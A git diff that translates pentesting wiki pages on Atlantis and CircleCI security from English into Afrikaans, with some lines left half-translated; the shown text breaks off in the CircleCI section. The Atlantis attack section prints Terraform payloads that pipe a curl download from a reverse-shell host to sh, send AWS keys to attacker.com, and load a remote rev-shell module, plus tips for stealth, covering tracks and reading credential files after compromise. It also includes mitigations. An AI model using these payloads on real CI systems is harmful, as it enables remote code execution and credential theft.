-Values are **chosen in this order**:
+Waardes word **in hierdie volgorde gekies**:
 
-1. Flags
-2. Environment Variables
-3. Config File
+1. Vlae
+2. Omgewing Veranderlikes
+3. Konfigurasie Lêer
 
 > [!WARNING]
-> Note that in the configuration you might find interesting values such as **tokens and passwords**.
+> Let daarop dat jy in die konfigurasie dalk interessante waardes soos **tokens en wagwoorde** mag vind.
 
 #### Repos Configuration
 
-Some configurations affects **how the repos are managed**. However, it's possible that **each repo require different settings**, so there are ways to specify each repo. This is the priority order:
+Sommige konfigurasies beïnvloed **hoe die repos bestuur word**. Dit is egter moontlik dat **elke repo verskillende instellings vereis**, so daar is maniere om elke repo te spesifiseer. Dit is die prioriteitsorde:
 
-1. Repo [**`/atlantis.yml`**](https://www.runatlantis.io/docs/repo-level-atlantis-yaml.html#repo-level-atlantis-yaml-config) file. This file can be used to specify how atlantis should treat the repo. However, by default some keys cannot be specified here without some flags allowing it.
-   1. Probably required to be allowed by flags like `allowed_overrides` or `allow_custom_workflows`
-2. [**Server Side Config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config): You can pass it with the flag `--repo-config` and it's a yaml configuring new settings for each repo (regexes supported)
-3. **Default** values
+1. Repo [**`/atlantis.yml`**](https://www.runatlantis.io/docs/repo-level-atlantis-yaml.html#repo-level-atlantis-yaml-config) lêer. Hierdie lêer kan gebruik word om te spesifiseer hoe atlantis die repo moet hanteer. Echter, standaard kan sommige sleutels nie hier gespesifiseer word nie sonder sommige vlae wat dit toelaat.
+1. Waarskynlik vereis om toegelaat te word deur vlae soos `allowed_overrides` of `allow_custom_workflows`.
+2. [**Server Side Config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config): Jy kan dit met die vlag `--repo-config` deurgee en dit is 'n yaml wat nuwe instellings vir elke repo konfigureer (regexes ondersteun).
+3. **Standaard** waardes.
 
 **PR Protections**
 
-Atlantis allows to indicate if you want the **PR** to be **`approved`** by somebody else (even if that isn't set in the branch protection) and/or be **`mergeable`** (branch protections passed) **before running apply**. From a security point of view, to set both options a recommended.
+Atlantis laat toe om aan te dui of jy wil hê die **PR** moet **`goedgekeur`** word deur iemand anders (selfs al is dit nie in die tak beskerming ingestel nie) en/of **`mergeable`** wees (tak beskermings geslaag) **voor die uitvoering van apply**. Vanuit 'n sekuriteitsoogpunt is dit aanbeveel om albei opsies in te stel.
 
-In case `allowed_overrides` is True, these setting can be **overwritten on each project by the `/atlantis.yml` file**.
+In die geval dat `allowed_overrides` waar is, kan hierdie instellings **oor geskryf word op elke projek deur die `/atlantis.yml` lêer**.
 
 **Scripts**
 
-The repo config can **specify scripts** to run [**before**](https://www.runatlantis.io/docs/pre-workflow-hooks.html#usage) (_pre workflow hooks_) and [**after**](https://www.runatlantis.io/docs/post-workflow-hooks.html) (_post workflow hooks_) a **workflow is executed.**
+Die repo konfigurasie kan **scripts spesifiseer** om [**voor**](https://www.runatlantis.io/docs/pre-workflow-hooks.html#usage) (_pre workflow hooks_) en [**na**](https://www.runatlantis.io/docs/post-workflow-hooks.html) (_post workflow hooks_) 'n **workflow uitgevoer word.**
 
-There isn't any option to allow **specifying** these scripts in the **repo `/atlantis.yml`** file.
+Daar is geen opsie om **te spesifiseer** hierdie scripts in die **repo `/atlantis.yml`** lêer nie.
 
 **Workflow**
 
-In the repo config (server side config) you can [**specify a new default workflow**](https://www.runatlantis.io/docs/server-side-repo-config.html#change-the-default-atlantis-workflow), or [**create new custom workflows**](https://www.runatlantis.io/docs/custom-workflows.html#custom-workflows)**.** You can also **specify** which **repos** can **access** the **new** ones generated.\
-Then, you can allow the **atlantis.yaml** file of each repo to **specify the workflow to use.**
+In die repo konfigurasie (bediener kant konfigurasie) kan jy [**'n nuwe standaard workflow spesifiseer**](https://www.runatlantis.io/docs/server-side-repo-config.html#change-the-default-atlantis-workflow), of [**nuwe persoonlike workflows skep**](https://www.runatlantis.io/docs/custom-workflows.html#custom-workflows)**.** Jy kan ook **spesifiseer** watter **repos** toegang kan hê tot die **nuwe** wat gegenereer is.\
+Dan kan jy die **atlantis.yaml** lêer van elke repo toelaat om **die workflow te spesifiseer wat gebruik moet word.**
 
 > [!CAUTION]
-> If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo. It's also potentially needed that **`allowed_overrides`** specifies also **`workflow`** to **override the workflow** that is going to be used.\
-> This will basically give **RCE in the Atlantis server to any user that can access that repo**.
+> As die [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) vlag `allow_custom_workflows` op **Waar** gestel is, kan workflows in die **`atlantis.yaml`** lêer van elke repo **gespesifiseer** word. Dit is ook potensieel nodig dat **`allowed_overrides`** ook **`workflow`** spesifiseer om die workflow wat gebruik gaan word te **oor te skryf**.\
+> Dit sal basies **RCE in die Atlantis bediener aan enige gebruiker wat toegang tot daardie repo kan kry, gee**.
 >
 > ```yaml
 > # atlantis.yaml
@@ -126,19 +126,18 @@ Then, you can allow the **atlantis.yaml** file of each repo to **specify the wor
 
 **Conftest Policy Checking**
 
-Atlantis supports running **server-side** [**conftest**](https://www.conftest.dev/) **policies** against the plan output. Common usecases for using this step include:
+Atlantis ondersteun die uitvoering van **server-side** [**conftest**](https://www.conftest.dev/) **beleide** teen die plan uitvoer. Algemene gebruiksgevalle vir die gebruik van hierdie stap sluit in:
 
-- Denying usage of a list of modules
-- Asserting attributes of a resource at creation time
-- Catching unintentional resource deletions
-- Preventing security risks (ie. exposing secure ports to the public)
+- Ontkenning van die gebruik van 'n lys van modules.
+- Bevestiging van eienskappe van 'n hulpbron tydens die skepping.
+- Vang onbedoelde hulpbron verwyderings.
+- Voorkoming van sekuriteitsrisiko's (bv. blootstelling van veilige poorte aan die publiek).
 
-You can check how to configure it in [**the docs**](https://www.runatlantis.io/docs/policy-checking.html#how-it-works).
+Jy kan kyk hoe om dit te konfigureer in [**die docs**](https://www.runatlantis.io/docs/policy-checking.html#how-it-works).
 
 ### Atlantis Commands
 
-[**In the docs**](https://www.runatlantis.io/docs/using-atlantis.html#using-atlantis) you can find the options you can use to run Atlantis:
-
+[**In die docs**](https://www.runatlantis.io/docs/using-atlantis.html#using-atlantis) kan jy die opsies vind wat jy kan gebruik om Atlantis te laat loop:
 ```bash
 # Get help
 atlantis help
@@ -161,94 +160,82 @@ atlantis apply [options] -- [terraform apply flags]
 ## --verbose
 ## You can also add extra terraform options
 ```
-
-### Attacks
+### Aanvalle
 
 > [!WARNING]
-> If during the exploitation you find this **error**: `Error: Error acquiring the state lock`
-
-You can fix it by running:
+> As jy tydens die ontginning hierdie **fout** vind: `Error: Error acquiring the state lock`
 
+Jy kan dit regmaak deur te loop:
 ```
 atlantis unlock #You might need to run this in a different PR
 atlantis plan -- -lock=false
 ```
+#### Atlantis plan RCE - Konfigurasie wysiging in nuwe PR
 
-#### Atlantis plan RCE - Config modification in new PR
-
-If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can **execute `atlantis plan`** (or maybe it's automatically executed) **you will be able to RCE inside the Atlantis server**.
-
-You can do this by making [**Atlantis load an external data source**](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source). Just put a payload like the following in the `main.tf` file:
+As jy skrywe toegang oor 'n repository het, sal jy in staat wees om 'n nuwe tak daarop te skep en 'n PR te genereer. As jy **`atlantis plan`** kan **uitvoer** (of miskien word dit outomaties uitgevoer), **sal jy in staat wees om RCE binne die Atlantis bediener te hê**.
 
+Jy kan dit doen deur [**Atlantis 'n eksterne databron te laat laai**](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source). Sit net 'n payload soos die volgende in die `main.tf`-lêer:
 ```json
 data "external" "example" {
-  program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
+program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
 }
 ```
-
-**Stealthier Attack**
+**Stealthier Aanval**
 
 You can perform this attack even in a **stealthier way**, by following this suggestions:
 
 - Instead of adding the rev shell directly into the terraform file, you can **load an external resource** that contains the rev shell:
-
 ```javascript
 module "not_rev_shell" {
-  source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules"
+source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules"
 }
 ```
-
 You can find the rev shell code in [https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules)
 
-- In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b`
-- **Instead** of creating a **PR to master** to trigger Atlantis, **create 2 branches** (test1 and test2) and create a **PR from one to the other**. When you have completed the attack, just **remove the PR and the branches**.
+- In die eksterne hulpbron, gebruik die **ref** kenmerk om die **terraform rev shell code in 'n tak** binne die repo te verberg, iets soos: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b`
+- **In plaas daarvan** om 'n **PR na master** te skep om Atlantis te aktiveer, **skep 2 takke** (test1 en test2) en skep 'n **PR van een na die ander**. Wanneer jy die aanval voltooi het, verwyder eenvoudig die **PR en die takke**.
 
 #### Atlantis plan Secrets Dump
 
 You can **dump secrets used by terraform** running `atlantis plan` (`terraform plan`) by putting something like this in the terraform file:
-
 ```json
 output "dotoken" {
-  value = nonsensitive(var.do_token)
+value = nonsensitive(var.do_token)
 }
 ```
+#### Atlantis apply RCE - Konfigurasie wysiging in nuwe PR
 
-#### Atlantis apply RCE - Config modification in new PR
+As jy skrywe toegang oor 'n repository het, sal jy in staat wees om 'n nuwe tak daarop te skep en 'n PR te genereer. As jy **`atlantis apply` kan uitvoer, sal jy in staat wees om RCE binne die Atlantis bediener te hê**.
 
-If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can **execute `atlantis apply` you will be able to RCE inside the Atlantis server**.
+Jy sal egter gewoonlik sommige beskermings moet omseil:
 
-However, you will usually need to bypass some protections:
-
-- **Mergeable**: If this protection is set in Atlantis, you can only run **`atlantis apply` if the PR is mergeable** (which means that the branch protection need to be bypassed).
-  - Check potential [**branch protections bypasses**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md)
-- **Approved**: If this protection is set in Atlantis, some **other user must approve the PR** before you can run `atlantis apply`
-  - By default you can abuse the [**Gitbot token to bypass this protection**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md)
-
-Running **`terraform apply` on a malicious Terraform file with** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\
-You just need to make sure some payload like the following ones ends in the `main.tf` file:
+- **Mergeable**: As hierdie beskerming in Atlantis gestel is, kan jy slegs **`atlantis apply` uitvoer as die PR mergeable is** (wat beteken dat die tak beskerming omseil moet word).
+- Kontroleer potensiële [**tak beskerming omseilings**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md)
+- **Goedgekeurd**: As hierdie beskerming in Atlantis gestel is, moet 'n **ander gebruiker die PR goedkeur** voordat jy `atlantis apply` kan uitvoer.
+- Standaard kan jy die [**Gitbot token misbruik om hierdie beskerming om te seil**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md)
 
+Voer **`terraform apply` uit op 'n kwaadwillige Terraform-lêer met** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\
+Jy moet net seker maak dat 'n payload soos die volgende in die `main.tf` lêer eindig:
 ```json
 // Payload 1 to just steal a secret
 resource "null_resource" "secret_stealer" {
-  provisioner "local-exec" {
-    command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
-  }
+provisioner "local-exec" {
+command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
+}
 }
 
 // Payload 2 to get a rev shell
 resource "null_resource" "rev_shell" {
-  provisioner "local-exec" {
-    command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'"
-  }
+provisioner "local-exec" {
+command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'"
+}
 }
 ```
-
-Follow the **suggestions from the previous technique** the perform this attack in a **stealthier way**.
+Volg die **voorstelle van die vorige tegniek** om hierdie aanval op 'n **stealthier manier** uit te voer.
 
 #### Terraform Param Injection
 
-When running `atlantis plan` or `atlantis apply` terraform is being run under-needs, you can pass commands to terraform from atlantis commenting something like:
-
+Wanneer jy `atlantis plan` of `atlantis apply` uitvoer, word terraform onder-needs uitgevoer, jy kan opdragte aan terraform deur atlantis deur iets soos te kommentaar:
 ```bash
 atlantis plan -- <terraform commands>
 atlantis plan -- -h #Get terraform plan help
@@ -256,7 +243,6 @@ atlantis plan -- -h #Get terraform plan help
 atlantis apply -- <terraform commands>
 atlantis apply -- -h #Get terraform apply help
 ```
-
 Something you can pass are env variables which might be helpful to bypass some protections. Check terraform env vars in [https://www.terraform.io/cli/config/environment-variables](https://www.terraform.io/cli/config/environment-variables)
 
 #### Custom Workflow
@@ -265,7 +251,7 @@ Running **malicious custom build commands** specified in an `atlantis.yaml` file
 This possibility was mentioned in a previous section:
 
 > [!CAUTION]
-> If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo. It's also potentially needed that **`allowed_overrides`** specifies also **`workflow`** to **override the workflow** that is going to be used.
+> If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allow_custom_workflows` is set to **True**, workflows can be **gespesifiseer** in the **`atlantis.yaml`** file of each repo. It's also potentially needed that **`allowed_overrides`** specifies also **`workflow`** to **oorheers die werkvloei** that is going to be used.
 >
 > This will basically give **RCE in the Atlantis server to any user that can access that repo**.
 >
@@ -288,97 +274,95 @@ This possibility was mentioned in a previous section:
 
 #### Bypass plan/apply protections
 
-If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allowed_overrides` _has_ `apply_requirements` configured, it's possible for a repo to **modify the plan/apply protections to bypass them**.
-
+If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allowed_overrides` _het_ `apply_requirements` configured, it's possible for a repo to **wysig die plan/apply beskerming om dit te omseil**.
 ```yaml
 repos:
-  - id: /.*/
-    apply_requirements: []
+- id: /.*/
+apply_requirements: []
 ```
-
 #### PR Hijacking
 
-If someone sends **`atlantis plan/apply` comments on your valid pull requests,** it will cause terraform to run when you don't want it to.
+As iemand **`atlantis plan/apply` kommentaar op jou geldige pull requests stuur,** sal dit veroorsaak dat terraform loop wanneer jy nie wil hê dit moet nie.
 
-Moreover, if you don't have configured in the **branch protection** to ask to **reevaluate** every PR when a **new commit is pushed** to it, someone could **write malicious configs** (check previous scenarios) in the terraform config, run `atlantis plan/apply` and gain RCE.
+Boonop, as jy nie in die **branch protection** gekonfigureer het om te vra om elke PR te **herwaardeer** wanneer 'n **nuwe commit gestuur** word nie, kan iemand **kwaadwillige konfigurasies skryf** (kyk vorige scenario's) in die terraform konfigurasie, `atlantis plan/apply` uitvoer en RCE verkry.
 
-This is the **setting** in Github branch protections:
+Dit is die **instelling** in Github branch protections:
 
 ![](<../images/image (216).png>)
 
 #### Webhook Secret
 
-If you manage to **steal the webhook secret** used or if there **isn't any webhook secret** being used, you could **call the Atlantis webhook** and **invoke atlatis commands** directly.
+As jy daarin slaag om die **webhook secret** te **steel** of as daar **geen webhook secret** gebruik word nie, kan jy die **Atlantis webhook** aanroep en **atlatis opdragte** direk aanroep.
 
 #### Bitbucket
 
-Bitbucket Cloud does **not support webhook secrets**. This could allow attackers to **spoof requests from Bitbucket**. Ensure you are allowing only Bitbucket IPs.
+Bitbucket Cloud ondersteun **nie webhook secrets** nie. Dit kan aanvallers toelaat om **versoekte van Bitbucket te spoof**. Verseker dat jy slegs Bitbucket IP's toelaat.
 
-- This means that an **attacker** could make **fake requests to Atlantis** that look like they're coming from Bitbucket.
-- If you are specifying `--repo-allowlist` then they could only fake requests pertaining to those repos so the most damage they could do would be to plan/apply on your own repos.
-- To prevent this, allowlist [Bitbucket's IP addresses](https://confluence.atlassian.com/bitbucket/what-are-the-bitbucket-cloud-ip-addresses-i-should-use-to-configure-my-corporate-firewall-343343385.html) (see Outbound IPv4 addresses).
+- Dit beteken dat 'n **aanvaller** **valse versoeke aan Atlantis** kan maak wat lyk asof dit van Bitbucket kom.
+- As jy `--repo-allowlist` spesifiseer, kan hulle slegs valse versoeke rakende daardie repos maak, so die meeste skade wat hulle kan aanrig, sal wees om te plan/apply op jou eie repos.
+- Om dit te voorkom, toelaat [Bitbucket se IP adresse](https://confluence.atlassian.com/bitbucket/what-are-the-bitbucket-cloud-ip-addresses-i-should-use-to-configure-my-corporate-firewall-343343385.html) (kyk Uitgaande IPv4 adresse).
 
 ### Post-Exploitation
 
-If you managed to get access to the server or at least you got a LFI there are some interesting things you should try to read:
+As jy daarin geslaag het om toegang tot die bediener te verkry of ten minste jy het 'n LFI, is daar 'n paar interessante dinge wat jy moet probeer lees:
 
-- `/home/atlantis/.git-credentials` Contains vcs access credentials
-- `/atlantis-data/atlantis.db` Contains vcs access credentials with more info
-- `/atlantis-data/repos/<org_name>`_`/`_`<repo_name>/<pr_num>/<workspace>/<path_to_dir>/.terraform/terraform.tfstate` Terraform stated file
-  - Example: /atlantis-data/repos/ghOrg\_/_myRepo/20/default/env/prod/.terraform/terraform.tfstate
-- `/proc/1/environ` Env variables
-- `/proc/[2-20]/cmdline` Cmd line of `atlantis server` (may contain sensitive data)
+- `/home/atlantis/.git-credentials` Bevat vcs toegang akkrediteer
+- `/atlantis-data/atlantis.db` Bevat vcs toegang akkrediteer met meer inligting
+- `/atlantis-data/repos/<org_name>`_`/`_`<repo_name>/<pr_num>/<workspace>/<path_to_dir>/.terraform/terraform.tfstate` Terraform staat lêer
+- Voorbeeld: /atlantis-data/repos/ghOrg\_/_myRepo/20/default/env/prod/.terraform/terraform.tfstate
+- `/proc/1/environ` Omgewings veranderlikes
+- `/proc/[2-20]/cmdline` Cmd lyn van `atlantis server` (kan sensitiewe data bevat)
 
 ### Mitigations
 
-#### Don't Use On Public Repos <a href="#don-t-use-on-public-repos" id="don-t-use-on-public-repos"></a>
+#### Moet nie op Publieke Repos Gebruik nie <a href="#don-t-use-on-public-repos" id="don-t-use-on-public-repos"></a>
 
-Because anyone can comment on public pull requests, even with all the security mitigations available, it's still dangerous to run Atlantis on public repos without proper configuration of the security settings.
+Omdat enigiemand kommentaar op publieke pull requests kan lewer, selfs met al die sekuriteitsmitigaties beskikbaar, is dit steeds gevaarlik om Atlantis op publieke repos te laat loop sonder behoorlike konfigurasie van die sekuriteitsinstellings.
 
-#### Don't Use `--allow-fork-prs` <a href="#don-t-use-allow-fork-prs" id="don-t-use-allow-fork-prs"></a>
+#### Moet nie `--allow-fork-prs` Gebruik nie <a href="#don-t-use-allow-fork-prs" id="don-t-use-allow-fork-prs"></a>
 
-If you're running on a public repo (which isn't recommended, see above) you shouldn't set `--allow-fork-prs` (defaults to false) because anyone can open up a pull request from their fork to your repo.
+As jy op 'n publieke repo (wat nie aanbeveel word nie, kyk bo) loop, moet jy nie `--allow-fork-prs` stel nie (standaard is vals) omdat enigiemand 'n pull request van hul fork na jou repo kan oopmaak.
 
 #### `--repo-allowlist` <a href="#repo-allowlist" id="repo-allowlist"></a>
 
-Atlantis requires you to specify a allowlist of repositories it will accept webhooks from via the `--repo-allowlist` flag. For example:
+Atlantis vereis dat jy 'n allowlist van repositories spesifiseer waarvan dit webhooks sal aanvaar via die `--repo-allowlist` vlag. Byvoorbeeld:
 
-- Specific repositories: `--repo-allowlist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests`
-- Your whole organization: `--repo-allowlist=github.com/runatlantis/*`
-- Every repository in your GitHub Enterprise install: `--repo-allowlist=github.yourcompany.com/*`
-- All repositories: `--repo-allowlist=*`. Useful for when you're in a protected network but dangerous without also setting a webhook secret.
+- Spesifieke repositories: `--repo-allowlist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests`
+- Jou hele organisasie: `--repo-allowlist=github.com/runatlantis/*`
+- Elke repository in jou GitHub Enterprise installasie: `--repo-allowlist=github.yourcompany.com/*`
+- Alle repositories: `--repo-allowlist=*`. Nuttig wanneer jy in 'n beskermde netwerk is, maar gevaarlik sonder om ook 'n webhook secret in te stel.
 
-This flag ensures your Atlantis install isn't being used with repositories you don't control. See `atlantis server --help` for more details.
+Hierdie vlag verseker dat jou Atlantis installasie nie gebruik word met repositories wat jy nie beheer nie. Kyk na `atlantis server --help` vir meer besonderhede.
 
-#### Protect Terraform Planning <a href="#protect-terraform-planning" id="protect-terraform-planning"></a>
+#### Beskerm Terraform Beplanning <a href="#protect-terraform-planning" id="protect-terraform-planning"></a>
 
-If attackers submitting pull requests with malicious Terraform code is in your threat model then you must be aware that `terraform apply` approvals are not enough. It is possible to run malicious code in a `terraform plan` using the [`external` data source](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source) or by specifying a malicious provider. This code could then exfiltrate your credentials.
+As aanvallers pull requests met kwaadwillige Terraform kode indien in jou bedreigingsmodel, moet jy bewus wees dat `terraform apply` goedkeuringe nie genoeg is nie. Dit is moontlik om kwaadwillige kode in 'n `terraform plan` te loop deur die [`external` data source](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source) of deur 'n kwaadwillige verskaffer te spesifiseer. Hierdie kode kan dan jou akkrediteer uitvreet.
 
-To prevent this, you could:
+Om dit te voorkom, kan jy:
 
-1. Bake providers into the Atlantis image or host and deny egress in production.
-2. Implement the provider registry protocol internally and deny public egress, that way you control who has write access to the registry.
-3. Modify your [server-side repo configuration](https://www.runatlantis.io/docs/server-side-repo-config.html)'s `plan` step to validate against the use of disallowed providers or data sources or PRs from not allowed users. You could also add in extra validation at this point, e.g. requiring a "thumbs-up" on the PR before allowing the `plan` to continue. Conftest could be of use here.
+1. Verskaffers in die Atlantis beeld bak of gasheer en egress in produksie ontken.
+2. Die verskaffer registrasie protokol intern implementeer en publieke egress ontken, sodat jy beheer wie skrywe toegang tot die registrasie het.
+3. Jou [server-side repo konfigurasie](https://www.runatlantis.io/docs/server-side-repo-config.html)'s `plan` stap wysig om te valideer teen die gebruik van verbode verskaffers of data bronne of PR's van nie toegelate gebruikers. Jy kan ook ekstra validasie by hierdie punt voeg, bv. vereis 'n "duim-op" op die PR voordat jy die `plan` toelaat om voort te gaan. Conftest kan hier nuttig wees.
 
 #### Webhook Secrets <a href="#webhook-secrets" id="webhook-secrets"></a>
 
-Atlantis should be run with Webhook secrets set via the `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` environment variables. Even with the `--repo-allowlist` flag set, without a webhook secret, attackers could make requests to Atlantis posing as a repository that is allowlisted. Webhook secrets ensure that the webhook requests are actually coming from your VCS provider (GitHub or GitLab).
+Atlantis moet met Webhook secrets gedraai word wat via die `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` omgewingsveranderlikes ingestel is. Selfs met die `--repo-allowlist` vlag ingestel, kan aanvallers versoeke aan Atlantis maak wat as 'n repository wat toegelaat is, voorgee. Webhook secrets verseker dat die webhook versoeke werklik van jou VCS verskaffer (GitHub of GitLab) kom.
 
-If you are using Azure DevOps, instead of webhook secrets add a basic username and password.
+As jy Azure DevOps gebruik, voeg in plaas van webhook secrets 'n basiese gebruikersnaam en wagwoord by.
 
-#### Azure DevOps Basic Authentication <a href="#azure-devops-basic-authentication" id="azure-devops-basic-authentication"></a>
+#### Azure DevOps Basiese Verifikasie <a href="#azure-devops-basic-authentication" id="azure-devops-basic-authentication"></a>
 
-Azure DevOps supports sending a basic authentication header in all webhook events. This requires using an HTTPS URL for your webhook location.
+Azure DevOps ondersteun die stuur van 'n basiese verifikasie kop in alle webhook gebeurtenisse. Dit vereis die gebruik van 'n HTTPS URL vir jou webhook ligging.
 
 #### SSL/HTTPS <a href="#ssl-https" id="ssl-https"></a>
 
-If you're using webhook secrets but your traffic is over HTTP then the webhook secrets could be stolen. Enable SSL/HTTPS using the `--ssl-cert-file` and `--ssl-key-file` flags.
+As jy webhook secrets gebruik, maar jou verkeer is oor HTTP, kan die webhook secrets gesteel word. Aktiveer SSL/HTTPS met die `--ssl-cert-file` en `--ssl-key-file` vlag.
 
-#### Enable Authentication on Atlantis Web Server <a href="#enable-authentication-on-atlantis-web-server" id="enable-authentication-on-atlantis-web-server"></a>
+#### Aktiveer Verifikasie op Atlantis Webbediener <a href="#enable-authentication-on-atlantis-web-server" id="enable-authentication-on-atlantis-web-server"></a>
 
-It is very recommended to enable authentication in the web service. Enable BasicAuth using the `--web-basic-auth=true` and setup a username and a password using `--web-username=yourUsername` and `--web-password=yourPassword` flags.
+Dit word baie aanbeveel om verifikasie in die webdiens te aktiveer. Aktiveer BasicAuth met die `--web-basic-auth=true` en stel 'n gebruikersnaam en 'n wagwoord op met die `--web-username=yourUsername` en `--web-password=yourPassword` vlag.
 
-You can also pass these as environment variables `ATLANTIS_WEB_BASIC_AUTH=true` `ATLANTIS_WEB_USERNAME=yourUsername` and `ATLANTIS_WEB_PASSWORD=yourPassword`.
+Jy kan ook hierdie as omgewingsveranderlikes deurgee `ATLANTIS_WEB_BASIC_AUTH=true` `ATLANTIS_WEB_USERNAME=yourUsername` en `ATLANTIS_WEB_PASSWORD=yourPassword`.
 
 ### References
 
@@ -386,7 +370,3 @@ You can also pass these as environment variables `ATLANTIS_WEB_BASIC_AUTH=true`
 - [**https://www.runatlantis.io/docs/provider-credentials.html**](https://www.runatlantis.io/docs/provider-credentials.html)
 
 {{#include ../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/circleci-security.md b/src/pentesting-ci-cd/circleci-security.md
index 8b8a1fea1..2347a087f 100644
--- a/src/pentesting-ci-cd/circleci-security.md
+++ b/src/pentesting-ci-cd/circleci-security.md
@@ -1,259 +1,235 @@
-# CircleCI Security
+# CircleCI Veiligheid
 
 {{#include ../banners/hacktricks-training.md}}
 
-### Basic Information
+### Basiese Inligting
 
-[**CircleCI**](https://circleci.com/docs/2.0/about-circleci/) is a Continuos Integration platform where you can **define templates** indicating what you want it to do with some code and when to do it. This way you can **automate testing** or **deployments** directly **from your repo master branch** for example.
+[**CircleCI**](https://circleci.com/docs/2.0/about-circleci/) is 'n Kontinuïteitsintegrasie-platform waar jy **sjablone** kan **definieer** wat jy wil hê dit moet met 'n paar kode doen en wanneer om dit te doen. Op hierdie manier kan jy **toetsing** of **ontplooiings** direk **van jou repo hooftak** byvoorbeeld **outomatiseer**.
 
-### Permissions
+### Toestemmings
 
-**CircleCI** **inherits the permissions** from github and bitbucket related to the **account** that logs in.\
-In my testing I checked that as long as you have **write permissions over the repo in github**, you are going to be able to **manage its project settings in CircleCI** (set new ssh keys, get project api keys, create new branches with new CircleCI configs...).
+**CircleCI** **erf die toestemmings** van github en bitbucket wat verband hou met die **rekening** wat aanmeld.\
+In my toetse het ek gekontroleer dat solank jy **skryftoestemmings oor die repo in github** het, jy in staat gaan wees om **sy projekinstellings in CircleCI te bestuur** (nuwe ssh sleutels op te stel, projek api sleutels te kry, nuwe takke met nuwe CircleCI konfigurasies te skep...).
 
-However, you need to be a a **repo admin** in order to **convert the repo into a CircleCI project**.
+Jy moet egter 'n **repo admin** wees om die **repo in 'n CircleCI projek te omskep**.
 
-### Env Variables & Secrets
+### Omgewing Veranderlikes & Geheime
 
-According to [**the docs**](https://circleci.com/docs/2.0/env-vars/) there are different ways to **load values in environment variables** inside a workflow.
+Volgens [**die dokumentasie**](https://circleci.com/docs/2.0/env-vars/) is daar verskillende maniere om **waardes in omgewing veranderlikes** binne 'n werksvloei te **laai**.
 
-#### Built-in env variables
+#### Ingeboude omgewing veranderlikes
 
-Every container run by CircleCI will always have [**specific env vars defined in the documentation**](https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables) like `CIRCLE_PR_USERNAME`, `CIRCLE_PROJECT_REPONAME` or `CIRCLE_USERNAME`.
+Elke houer wat deur CircleCI gedraai word, sal altyd [**spesifieke omgewing veranderlikes in die dokumentasie gedefinieer**](https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables) hê soos `CIRCLE_PR_USERNAME`, `CIRCLE_PROJECT_REPONAME` of `CIRCLE_USERNAME`.
 
-#### Clear text
-
-You can declare them in clear text inside a **command**:
+#### Duidelike teks
 
+Jy kan hulle in duidelike teks binne 'n **opdrag** verklaar:
 ```yaml
 - run:
-    name: "set and echo"
-    command: |
-      SECRET="A secret"
-      echo $SECRET
+name: "set and echo"
+command: |
+SECRET="A secret"
+echo $SECRET
 ```
-
-You can declare them in clear text inside the **run environment**:
-
+U kan hulle in duidelike teks binne die **run environment** verklaar:
 ```yaml
 - run:
-    name: "set and echo"
-    command: echo $SECRET
-    environment:
-      SECRET: A secret
+name: "set and echo"
+command: echo $SECRET
+environment:
+SECRET: A secret
 ```
-
-You can declare them in clear text inside the **build-job environment**:
-
+U kan hulle in duidelike teks binne die **build-job omgewing** verklaar:
 ```yaml
 jobs:
-  build-job:
-    docker:
-      - image: cimg/base:2020.01
-  environment:
-    SECRET: A secret
+build-job:
+docker:
+- image: cimg/base:2020.01
+environment:
+SECRET: A secret
 ```
-
-You can declare them in clear text inside the **environment of a container**:
-
